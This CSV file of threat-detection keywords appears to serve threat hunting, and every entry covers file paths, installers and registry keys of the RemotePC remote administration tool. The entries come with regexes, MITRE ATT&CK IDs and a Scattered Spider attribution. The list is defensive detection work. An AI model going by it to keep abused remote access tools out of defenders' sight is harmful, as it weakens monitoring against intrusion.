"*.remotepc.com*",".{0,1000}\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A"
"*/AttendedUDP.zip*",".{0,1000}\/AttendedUDP\.zip.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/remotepc.deb*",".{0,1000}\/remotepc\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/remotepc.deb*",".{0,1000}\/remotepc\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemotePC.exe*",".{0,1000}\/RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemotePC.exe*",".{0,1000}\/RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemotePC.lnk*",".{0,1000}\/RemotePC\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemotePC.tmp*",".{0,1000}\/RemotePC\.tmp.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/remotepc-attended.deb*",".{0,1000}\/remotepc\-attended\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemotePCAttended.dmg*",".{0,1000}\/RemotePCAttended\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/remotepclauncher.exe*",".{0,1000}\/remotepclauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemotePCSuite.dmg*",".{0,1000}\/RemotePCSuite\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/remotepcuiu.exe*",".{0,1000}\/remotepcuiu\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemotePCViewer.msi*",".{0,1000}\/RemotePCViewer\.msi.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RpcDND_Console.exe*",".{0,1000}\/RpcDND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/rpcdownloader.exe*",".{0,1000}\/rpcdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RPCFireWallRule.exe*",".{0,1000}\/RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/rpcperfviewer.exe*",".{0,1000}\/rpcperfviewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RPCProxyLatency.exe*",".{0,1000}\/RPCProxyLatency\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/viewerhostkeypopup.exe*",".{0,1000}\/viewerhostkeypopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AttendedServiceRemove.exe*",".{0,1000}\\AttendedServiceRemove\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AttendedUDP.zip*",".{0,1000}\\AttendedUDP\.zip.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\BSUtility.exe*",".{0,1000}\\BSUtility\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Control\Print\Monitors\REMOTEPCPRINTER*",".{0,1000}\\Control\\Print\\Monitors\\REMOTEPCPRINTER.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\App Paths\RemotePCPerformance*",".{0,1000}\\CurrentVersion\\App\sPaths\\RemotePCPerformance.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Devices\RemotePC Printer*",".{0,1000}\\CurrentVersion\\Devices\\RemotePC\sPrinter.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\InventoryApplicationFile\rpcattendedadmin*",".{0,1000}\\InventoryApplicationFile\\rpcattendedadmin.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Print\Printers\RemotePC Printer\*",".{0,1000}\\Print\\Printers\\RemotePC\sPrinter\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\RemotePC\*",".{0,1000}\\Program\sFiles\s\(x86\)\\RemotePC\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\program files (x86)\remotepc\remotepcperformance\*",".{0,1000}\\program\sfiles\s\(x86\)\\remotepc\\remotepcperformance\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\RemotePC*",".{0,1000}\\ProgramData\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC (1).exe*",".{0,1000}\\RemotePC\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC Attended.lnk*",".{0,1000}\\RemotePC\sAttended\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC Attended\*",".{0,1000}\\RemotePC\sAttended\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC Performance Host\*",".{0,1000}\\RemotePC\sPerformance\sHost\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC.Common.dll*",".{0,1000}\\RemotePC\.Common\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC.Common.dll*",".{0,1000}\\RemotePC\.Common\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC.exe*",".{0,1000}\\RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC.exe*",".{0,1000}\\RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC.lnk*",".{0,1000}\\RemotePC\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC.tmp*",".{0,1000}\\RemotePC\.tmp.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC.tmp*",".{0,1000}\\RemotePC\.tmp.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePC\*.dll*",".{0,1000}\\RemotePC\\.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCAttended.dmg*",".{0,1000}\\RemotePCAttended\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCCopyPaste.txt*",".{0,1000}\\RemotePCCopyPaste\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDDriver.cat*",".{0,1000}\\RemotePCDDriver\.cat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDDriver.inf*",".{0,1000}\\RemotePCDDriver\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDDriver.inf*",".{0,1000}\\RemotePCDDriver\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDDriverumode1_0.dll*",".{0,1000}\\RemotePCDDriverumode1_0\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDDriverumode1_2.dll*",".{0,1000}\\RemotePCDDriverumode1_2\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDesktop.txt*",".{0,1000}\\RemotePCDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDnD.dll*",".{0,1000}\\RemotePCDnD\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCDnDLauncher.exe*",".{0,1000}\\RemotePCDnDLauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCHDDesktop.txt*",".{0,1000}\\RemotePCHDDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCHDService.txt*",".{0,1000}\\RemotePCHDService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remotepclauncher.exe*",".{0,1000}\\remotepclauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCModules.log*",".{0,1000}\\RemotePCModules\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPDF.conf*",".{0,1000}\\RemotePCPDF\.conf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPDF.conf*",".{0,1000}\\RemotePCPDF\.conf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPerformancePlugins.exe*",".{0,1000}\\RemotePCPerformancePlugins\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPrinter.exe*",".{0,1000}\\RemotePCPrinter\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPrinter.exe*",".{0,1000}\\RemotePCPrinter\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPrinter.exe.config*",".{0,1000}\\RemotePCPrinter\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPrinter.pdb*",".{0,1000}\\RemotePCPrinter\.pdb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPrinterCore.dll*",".{0,1000}\\RemotePCPrinterCore\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPrinterCore.pdb*",".{0,1000}\\RemotePCPrinterCore\.pdb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCProxys.dat*",".{0,1000}\\RemotePCProxys\.dat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPS5UI.DLL*",".{0,1000}\\RemotePCPS5UI\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPS5UI.DLL*",".{0,1000}\\RemotePCPS5UI\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPSCRIPT.*",".{0,1000}\\RemotePCPSCRIPT\..{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPSCRIPT.HLP*",".{0,1000}\\RemotePCPSCRIPT\.HLP.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPSCRIPT.NTF*",".{0,1000}\\RemotePCPSCRIPT\.NTF.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCPSCRIPT5.DLL*",".{0,1000}\\RemotePCPSCRIPT5\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCService.exe*",".{0,1000}\\RemotePCService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCService.txt*",".{0,1000}\\RemotePCService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCService_2.txt*",".{0,1000}\\RemotePCService_2\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCSuite.dmg*",".{0,1000}\\RemotePCSuite\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUDE.cat*",".{0,1000}\\RemotePCUDE\.cat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUDE.inf*",".{0,1000}\\RemotePCUDE\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUDE.sys*",".{0,1000}\\RemotePCUDE\.sys.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUDE.sys*",".{0,1000}\\RemotePCUDE\.sys.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUDEHost.cat*",".{0,1000}\\RemotePCUDEHost\.cat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUDEHost.inf*",".{0,1000}\\RemotePCUDEHost\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUDEHost.sys*",".{0,1000}\\RemotePCUDEHost\.sys.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUIA.exe*",".{0,1000}\\RemotePCUIA\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemotePCUIU.exe*",".{0,1000}\\RemotePCUIU\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remotepcuiu.exe*",".{0,1000}\\remotepcuiu\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
